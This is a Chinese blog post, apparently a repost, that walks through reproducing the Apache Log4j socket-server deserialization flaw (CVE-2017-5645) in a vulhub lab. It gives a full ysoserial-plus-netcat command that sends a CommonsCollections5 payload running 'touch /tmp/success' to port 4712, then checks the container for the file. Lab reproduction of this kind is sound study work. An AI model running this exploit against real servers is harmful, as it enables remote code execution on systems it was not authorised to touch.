当前位置: 首页 > news >正文

vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

news 2025/6/28 19:01:26

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:


 

http://www.lryc.cn/news/302684.html

相关文章:

  • 基于python+django+vue.js开发的医院门诊管理系统/医疗管理系统
  • Linux文件系统笔记
  • vue封装el-table表格组件
  • 「Python系列」Python数据结构
  • MySQL多实例部署:从概念到实操的全面指南
  • C++学习Day07之虚函数和纯虚函数
  • GZ036 区块链技术应用赛项赛题第9套
  • 微服务—RabbitMQ高级(延迟消息)
  • 香港服务器如何取消windows的自动更新
  • kali虚拟机桥接模式快速设置
  • 「连载」边缘计算(十五)02-18:边缘部分源码(源码分析篇)
  • MySQL性能调优篇(8)-NoSQL与MySQL的比较
  • 【Linux学习】线程池
  • 利用Docker部署一个简单的springboot项目
  • 【Java】纯小白的三种工厂模式基础知识学习笔记
  • Spring Boot 笔记 006 创建接口_注册
  • 沁恒CH32V30X学习笔记08---基本定时器超时功能
  • GitHub | 在 GitHub 上在线展示 Vue 项目
  • Android的Compose
  • C++ STL->list模拟实现
  • 基于python+django+vue.js开发的健身房管理系统
  • GPT-4对编程开发的支持
  • “成像光谱遥感技术中的AI革命:ChatGPT应用指南“
  • 12.25 校招 实习 内推 面经
  • 深度学习基础之《TensorFlow框架(3)—TensorBoard》
  • 杨氏矩阵和杨辉三角
  • PostgreSQL教程(四):高级特性
  • 168基于matlab的六自由度并联摇摆台的反解控制算法
  • MDC 日志跟踪笔记
  • MySQL错误-this is incompatible with sql_mode=only_full_group_by完美解决方案